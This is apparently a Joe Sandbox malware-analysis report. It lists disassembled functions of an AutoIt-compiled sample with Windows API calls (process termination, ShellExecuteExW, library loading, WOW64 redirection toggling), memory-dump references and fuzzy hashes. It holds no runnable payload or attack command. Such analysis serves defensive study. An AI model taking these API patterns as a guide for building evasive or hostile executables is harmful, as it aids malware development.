                                                      Function 00E951FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00E95218
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E95229
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E95230
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00E95238
                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E9524F
                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00E95261
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      • Opcode ID: 928bd6b962fb8a5880fb4d840a3deb74040ee20aac4eb9c57a8a94e792354e34
                                                      • Instruction ID: c25ee15c4d86797a935f4a2e1839ad87292b48ec4c48835700159e196f389af9
                                                      • Opcode Fuzzy Hash: 928bd6b962fb8a5880fb4d840a3deb74040ee20aac4eb9c57a8a94e792354e34
                                                      • Instruction Fuzzy Hash: E5018475A01B04BFEF105BA69C49E4EBFB8EB44751F144066FA08B7390D6719805CBA0
                                                      Function 00E31BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E31BF4
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E31BFC
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E31C07
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E31C12
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E31C1A
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E31C22
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: 39c384275fc3caefc3e5eb46b202ae5a27697c09b80fa9dde2004be7ec0119a0
                                                      • Instruction ID: 44f7e68481842899474b5a5d31b0891679cc914349d2fe26949322aa7bf2d4fc
                                                      • Opcode Fuzzy Hash: 39c384275fc3caefc3e5eb46b202ae5a27697c09b80fa9dde2004be7ec0119a0
                                                      • Instruction Fuzzy Hash: B7016CB09027597DE3008F5A8C85B52FFA8FF19754F00411BD15C47A41C7F5A864CBE5
                                                      Function 00E9EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E9EB30
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E9EB46
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00E9EB55
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E9EB64
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E9EB6E
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E9EB75
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      • Opcode ID: 73e6650a02580f198dfab94c6325e628ebfeea2a66d32a553362ed2eba72307c
                                                      • Instruction ID: a4017b9f6456160da27a217bd466339b80eb1aacf0e0ed8a0fb6decf93163d37
                                                      • Opcode Fuzzy Hash: 73e6650a02580f198dfab94c6325e628ebfeea2a66d32a553362ed2eba72307c
                                                      • Instruction Fuzzy Hash: 98F09A72601158BFE7205B639C0EEEF3A7CEFCAF15F100168F605E1090E7A21A06C6B5
                                                      Function 00E87439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClientRect.USER32(?), ref: 00E87452
                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00E87469
                                                      • GetWindowDC.USER32(?), ref: 00E87475
                                                      • GetPixel.GDI32(00000000,?,?), ref: 00E87484
                                                      • ReleaseDC.USER32(?,00000000), ref: 00E87496
                                                      • GetSysColor.USER32(00000005), ref: 00E874B0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                      • String ID:
                                                      • API String ID: 272304278-0
                                                      • Opcode ID: d407f3f0fc91cf9173c6e3433a3118b03c9456e8f63d35de1e1bce6adf0547ad
                                                      • Instruction ID: e5435bc343f2956f31ef2d4ae2248fb5aeaf291a30677c7b40d2bd39d850f579
                                                      • Opcode Fuzzy Hash: d407f3f0fc91cf9173c6e3433a3118b03c9456e8f63d35de1e1bce6adf0547ad
                                                      • Instruction Fuzzy Hash: AC018B31400215EFDB10AFA5DC08FEA7BB5FB04311F240060FD6DB21A1CB321E46AB51
                                                      Function 00E91874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E9187F
                                                      • UnloadUserProfile.USERENV(?,?), ref: 00E9188B
                                                      • CloseHandle.KERNEL32(?), ref: 00E91894
                                                      • CloseHandle.KERNEL32(?), ref: 00E9189C
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00E918A5
                                                      • HeapFree.KERNEL32(00000000), ref: 00E918AC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      • Opcode ID: 9d327459e92336cf49fb4311cdc79806c61b8b0b65f2a73b00b371ab59c9f816
                                                      • Instruction ID: 4ea46741e674fd5d9ecba58dcd9816b1340003afa6d7c686b71a97e210c99fe7
                                                      • Opcode Fuzzy Hash: 9d327459e92336cf49fb4311cdc79806c61b8b0b65f2a73b00b371ab59c9f816
                                                      • Instruction Fuzzy Hash: 68E0C236404501BFDB015BA7ED0CD0ABB39FB49B22B208231F229A1471CB339466DB50
                                                      Function 00EB7B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E50242: EnterCriticalSection.KERNEL32(00F0070C,00F01884,?,?,00E4198B,00F02518,?,?,?,00E312F9,00000000), ref: 00E5024D
                                                        • Part of subcall function 00E50242: LeaveCriticalSection.KERNEL32(00F0070C,?,00E4198B,00F02518,?,?,?,00E312F9,00000000), ref: 00E5028A
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00E500A3: __onexit.LIBCMT ref: 00E500A9
                                                      • __Init_thread_footer.LIBCMT ref: 00EB7BFB
                                                        • Part of subcall function 00E501F8: EnterCriticalSection.KERNEL32(00F0070C,?,?,00E48747,00F02514), ref: 00E50202
                                                        • Part of subcall function 00E501F8: LeaveCriticalSection.KERNEL32(00F0070C,?,00E48747,00F02514), ref: 00E50235
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                      • String ID: +T$5$G$Variable must be of type 'Object'.
                                                      • API String ID: 535116098-4125810065
                                                      • Opcode ID: eba2d0e2f8e4562f04ab2fac8189c03c558312b74392e315393daa82ab2acb10
                                                      • Instruction ID: 804eb39618a16963ac8f2170361afa1b72c6e6229e98a5b670ffd924957fd6ba
                                                      • Opcode Fuzzy Hash: eba2d0e2f8e4562f04ab2fac8189c03c558312b74392e315393daa82ab2acb10
                                                      • Instruction Fuzzy Hash: E291AC70A04209AFCB14EF54D881DEEBBB1BF89304F14905DF886BB692DB31AE41DB51
                                                      Function 00E9C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E37620: _wcslen.LIBCMT ref: 00E37625
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E9C6EE
                                                      • _wcslen.LIBCMT ref: 00E9C735
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E9C79C
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E9C7CA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                      • String ID: 0
                                                      • API String ID: 1227352736-4108050209
                                                      • Opcode ID: d07e9232e3157cf05b12676f9f427e3b6a045e3fbe86b074b3efcf82337d76a6
                                                      • Instruction ID: a8b5d23f23e3ec9c6a60ebe03174c24754a5029abd66c019be77e114fcc94a91
                                                      • Opcode Fuzzy Hash: d07e9232e3157cf05b12676f9f427e3b6a045e3fbe86b074b3efcf82337d76a6
                                                      • Instruction Fuzzy Hash: 8D5101716043009BDB14AF78C885BABB7E4AF89718F242A2EF995F31D1DB70D844DB52
                                                      Function 00EBAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00EBAEA3
                                                        • Part of subcall function 00E37620: _wcslen.LIBCMT ref: 00E37625
                                                      • GetProcessId.KERNEL32(00000000), ref: 00EBAF38
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EBAF67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                      • String ID: <$@
                                                      • API String ID: 146682121-1426351568
                                                      • Opcode ID: 8de955b929acd44554095d715c895c4ac8aa22387b384c467cce3ab85fdb0be8
                                                      • Instruction ID: d3ee41e7a9866cc533b0021c8c81e84e4bbe3694a1d806244564874498fa5436
                                                      • Opcode Fuzzy Hash: 8de955b929acd44554095d715c895c4ac8aa22387b384c467cce3ab85fdb0be8
                                                      • Instruction Fuzzy Hash: BE716571A00219DFCF14DF54C488A9EBBF1AF08314F0894A9E856BB262CB75ED85CB91
                                                      Function 00E9719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E97206
                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E9723C
                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E9724D
                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E972CF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                      • String ID: DllGetClassObject
                                                      • API String ID: 753597075-1075368562
                                                      • Opcode ID: 15364708f04dbd8018f44c0ffec9e8bd9e785cc708f0723678af48de6655a3a2
                                                      • Instruction ID: 0e2a1bc51939ef59085c30aa4badecbd4ad55e44d005902e1f3eed27ff37c9bd
                                                      • Opcode Fuzzy Hash: 15364708f04dbd8018f44c0ffec9e8bd9e785cc708f0723678af48de6655a3a2
                                                      • Instruction Fuzzy Hash: DC41BEB1624204EFDF15CF54C884A9A7BB9EF44700F2490A9FD49AF21AD7B1DD09CBA0
                                                      Function 00EC3D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EC3E35
                                                      • IsMenu.USER32(?), ref: 00EC3E4A
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EC3E92
                                                      • DrawMenuBar.USER32 ref: 00EC3EA5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$DrawInfoInsert
                                                      • String ID: 0
                                                      • API String ID: 3076010158-4108050209
                                                      • Opcode ID: 01b440bc3932eba94c69fb0406f4f1e27af8421973303d23c961e3fa7d059690
                                                      • Instruction ID: ea49bf017d907119d10204594651271bb70ebe719f6be096d820960692416b12
                                                      • Opcode Fuzzy Hash: 01b440bc3932eba94c69fb0406f4f1e27af8421973303d23c961e3fa7d059690
                                                      • Instruction Fuzzy Hash: 60415975A00309AFDB10DF60D984EEABBB5FF49354F04912DE905A7250D732AE56CF60
                                                      Function 00E91DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00E93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E93CCA
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E91E66
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E91E79
                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E91EA9
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_wcslen$ClassName
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 2081771294-1403004172
                                                      • Opcode ID: 645a2d7ad34715642440c6747e3dd1e095484c97fe61521f51589b2b087bc5da
                                                      • Instruction ID: 4c0d18877a5a0fd8ca4ade6e5fbe317fd86f7e20e7dff7b0ecfb346e345eb6fe
                                                      • Opcode Fuzzy Hash: 645a2d7ad34715642440c6747e3dd1e095484c97fe61521f51589b2b087bc5da
                                                      • Instruction Fuzzy Hash: 1121F375A00204BEDF14AB64DD4ACFFBBB8DF45364F106129F925B71E1DB75490AC620
                                                      Function 00EC2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EC2F8D
                                                      • LoadLibraryW.KERNEL32(?), ref: 00EC2F94
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EC2FA9
                                                      • DestroyWindow.USER32(?), ref: 00EC2FB1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                      • String ID: SysAnimate32
                                                      • API String ID: 3529120543-1011021900
                                                      • Opcode ID: 4334a187da547784970e49c3faa564058ac91e91728a15ab0fb6bb8999f4611b
                                                      • Instruction ID: 3c6a5d4a4c029f61379558204a5b0ed6798fa633923612282d4efa3f7fb935b3
                                                      • Opcode Fuzzy Hash: 4334a187da547784970e49c3faa564058ac91e91728a15ab0fb6bb8999f4611b
                                                      • Instruction Fuzzy Hash: 07219A71200249AFEB218F64DD80FBB77B9EB59368F10622CFA50F21A0D772DC529760
                                                      Function 00E54D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E54D1E,00E628E9,(,00E54CBE,00000000,00EF88B8,0000000C,00E54E15,(,00000002), ref: 00E54D8D
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E54DA0
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00E54D1E,00E628E9,(,00E54CBE,00000000,00EF88B8,0000000C,00E54E15,(,00000002,00000000), ref: 00E54DC3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 7e86bcf980adf06b536c4ddafd4fa66722a1a5414c2aee7b545a6d0578c8c24e
                                                      • Instruction ID: 6c7a08dbddb5cd68b30f331151325bf04cbca5d422e48e76cf3ba1413a23969f
                                                      • Opcode Fuzzy Hash: 7e86bcf980adf06b536c4ddafd4fa66722a1a5414c2aee7b545a6d0578c8c24e
                                                      • Instruction Fuzzy Hash: AEF0AF30A00208BFDB109F92DC09FAEBFB4EF44716F1400A5FC09B22A0CB31598ACB91
                                                      Function 00E34E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E34EDD,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34E9C
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E34EAE
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00E34EDD,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34EC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 145871493-3689287502
                                                      • Opcode ID: 0e773d52db0f5524a2ceb94467463ba7aa172d9d6fc9a4d3607a462b790f3924
                                                      • Instruction ID: 1320b2e5d9eb6334821d303835137106d48393034919958301510b875bc1b858
                                                      • Opcode Fuzzy Hash: 0e773d52db0f5524a2ceb94467463ba7aa172d9d6fc9a4d3607a462b790f3924
                                                      • Instruction Fuzzy Hash: 0BE08635A026225F922117276C1CF6B6964AF81B66B191125FD08F6150DB61DD0780A1
                                                      Function 00E34E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E73CDE,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34E62
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E34E74
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00E73CDE,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34E87
                                                      Strings
                                                      Memory Dump Source
